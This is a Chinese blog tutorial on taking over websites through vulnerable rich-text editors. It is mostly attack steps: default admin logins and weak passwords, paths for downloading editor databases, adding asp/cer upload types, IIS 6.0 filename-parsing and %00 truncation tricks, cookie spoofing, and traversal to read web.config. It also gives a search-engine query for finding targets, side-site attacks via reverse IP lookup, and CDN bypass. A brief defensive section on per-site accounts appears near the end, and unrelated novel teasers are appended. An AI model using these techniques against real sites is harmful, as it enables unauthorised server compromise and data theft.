编辑器漏洞

🧧一.本文介绍

1、本文介绍Ewebeditor常识、获取webshell、fckeditor获取webshell、旁注原理、ip逆向查询、目录越权及跨库查询、cdn绕过。

二.学习步骤

1、Ewebeditor常识:

默认后台:xxxx.com/ewebeditor/admin_login.asp

数据库地址:ewebeditor/db/ewebeditor.mdb

帐号:admin     密码:admin/admin888/admin000(各种弱口令)

常用数据库路径为:

ewebeditor/db/ewebeditor.asa

ewebeditor/db/ewebeditor.asp

ewebeditor/db/#ewebeditor.asa

ewebeditor/db/#ewebeditor.mdb

ewebeditor/db/ewebeditor.mdb

ewebeditor/db/!@#ewebeditor.asp

ewebeditor/db/ewebeditor1033.mdb 等

默认数据库下载报错。(.mdb被保护了,从这里找到.mdb删除就好了)


2、Ewebeditor后台获取webshell


1. http://IP/admin_login.asp:账号:admin 密码:admin,然后添加样式,

在图片类型中加入以下类型:asa|cer|asp|aaspsp


最后添加工具栏:插入或修改图片

2. 工具栏添加好后点击“预览”,上传在样式的图片格式中加入cer或asp等,我上传的是shell.cer,然后在代码的地方可以看到URL,然后菜刀连接即可。用低版本浏览器,高版本可能打不开.

🛒2)目录遍历  

 点击"上传文件管理" 然后选择样式目录。

在id=14后面加上&dir=../,发现没有起作用,那就是2.1.6这个版本不存在这个漏洞。换成2.8.0。2.8.0存在这个文件遍历漏洞。

4. 在下载的数据库中看eWebEditor_style表中的S_ImageExt字段是否有被人添加过什么。

使用下面的语句进入突破:

ewebeditor.asp?ID=xx&style=yy  其中的id=xx就是被修改过的那条记录的id,而yy就是S_name字段的名字。

🎏3、Ewebeditor文件上传实验

将代码新建为html:

<input type=file name=uploadfile size=100><br><br>

<input type=submit value=Fuck>

</form>

创建完直接打开,点击上传按钮将马上传,右键查看源代码:

默认文件上传保存的路径为ewebiditor/uploadfile,访问:http://IP/uploadfile/2020417145621756.cer,输入马的密码:

🎨4、fckeditor获取webshell

1.查看编辑器版本

FCKeditor/_whatsnew.html

🎭2.FCKeditor编辑器页

FCKeditor/_samples/default.html

🎃3.常用上传地址

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

2.5的版本下面这条语句能用:

http://192.168.87.129:8234//editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

若出现:

根据提示,需要:

开启文件上传功能,把\editor\filemanager\connectors\asp\config.asp文件中的

DimConfigIsEnabled

ConfigIsEnabled = False

设置成功true。

手工新建:

/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=fendo.asp

原因:

CurrentFolder:当前文件夹 未进行过滤(这个文件夹下的没有过滤)

NewFolderName:新建文件名 进行了过滤

添加敏感文件夹

敏感目录

登录即可获取shell

CKFinder编辑器:

任意文件上传漏洞

其1.4.3 asp.net版本存在任意文件上传漏洞,攻击者可以利用该漏洞上传任意文件,CKFinder在上传文件的时候,强制将文件名(不包括后缀)中点号等其他字符转为下划线_,但是在修改文件名时却没有任何限制,从而导致可以上传1_php;1.jpg等畸形文件名,最终导致文件上传漏洞

然后修改文件名

1_php;1.jpg

利用iis6.0目录解析漏洞拿shell

创建目录/x.asp/

在目录下上传图片马即可拿shell

southidceditor :南方数据编辑器

任意文件上传漏洞

首先登陆后台

利用编辑器上传

访问admin/southidceditor/admin_style.asp

修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传

UEDITOR编辑器:

利用ii6.0文件名解析漏洞

上传图片改名为:

x.php;20221.jpg获取shell

DotNetTextBox编辑器:

任意文件上传漏洞

关键字:system_dntb/

确定有system_dntb/uploadimg.aspx并能打开,这时候是不能上传的,由于他是验证cookie来得出上传后的路径,这样我们可以用cookie欺骗工具

cookie:UserType=0;IsEdition=0;Info=1;

uploadFolder=../system_dntb/Upload/;

路径可以修改,只要权限够,上传后改名为1.asp;.jpg利用iis解析漏洞

Kedit编辑器:PHPWEB网站管理系统后台

两种利用方式:

第一种是利用iis6.0文件名解析漏洞:

xx.php;xx.jpg

第二种方式:

%00截断

xx.php%00jpg

ute Editor在线编辑器:

本地包含漏洞

影响版本:

Cute Editor For Net 6.4

脆弱描述:

可以随意查看网站文件内容,危害较大

攻击利用:

http://www.xx.com/Cute_Client?CuteEditor/Load.ashx?type=image&file=../../../web.config

Cute Editor Asp.Net版:

利用iis解析漏洞获得权限

影响版本:

CuteEditor for ASP.NET中文版脆弱描述:

脆弱描述:

CuteEditor对上传文件名未重命名,导致其可利用IIS文件名解析Bug获得webshell权限。

攻击利用:

可通过在搜索引擎中键入关键字 inurl:Post.aspx?SmallClassID= 来找到测试目标。

在编辑器中点击“多媒体插入”,上传一个名为“xxx.asp;.avi”的网马,以此获得权限。


5、旁注原理

主站不存在漏洞,通过同服务器的其它站点存在的漏洞,进而获取整个服务器网站的权限,进行控制。

6、ip逆向查询

可通过ping 域名获取其相关IP地址,之后通过IP地址反查获取其旁注的域名。

相关网址:

http://tool.chinaz.com/Same/

http://dns.aizhan.com/

http://www.11best.com/ip/

目录越权:

通过一个网站的目录访问统一服务器下的其他网站的目录,一个网站被攻陷,全都被攻陷

防御方法:每个网站创建一个不同的账号

1、建立一个账号test,默认在 users 组

2、将网站的身份验证和访问控制的匿名访问更换为test

3、将IUSR删除,添加test用户,需要注意的是,尽量不要同时给读取运行和写入权限,读写分离。

4、如果要绝对的安全,可以将C盘的访问权限设置为仅管理员访问


跨库查询:是指由于权限设置不严格,导致普通帐号被授予过高的权限,从而使得其可以对其他的数据库进行操作。比如,在mysql中,informatin_schema

这个表默认只有root有权限进行操作。但是如果一个普通账户权限过高后,他便可以对该数据库进行操作,从而影响整个mysql数据库的运行。

sqlmap里面使用“—current-代表”进行判断当前库是哪个。Mysql的root、mssql的sa、oracle的sys 分别是其数据库中权限最大的账户。

8、cdn绕过

1.利用SecurityTrails平台

2. 二级域名或泛解析ping

3.nslookup

4.https://dnsdb.io/zh-cn/ ###DNS查询

https://x.threatbook.cn/ ###微步在线http://toolbar.netcraft.com/site_report?url= ###在线域名信息查询http://viewdns.info/ ###DNS、IP等查询

https://tools.ipip.net/cdn.php ###CDN查询IP

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 205,236评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 87,867评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,715评论 0 340
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,899评论 1 278
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,895评论 5 368
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,733评论 1 283
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,085评论 3 399
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,722评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 43,025评论 1 300
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,696评论 2 323
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,816评论 1 333
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,447评论 4 322
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,057评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,009评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,254评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,204评论 2 352
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,561评论 2 343

推荐阅读更多精彩内容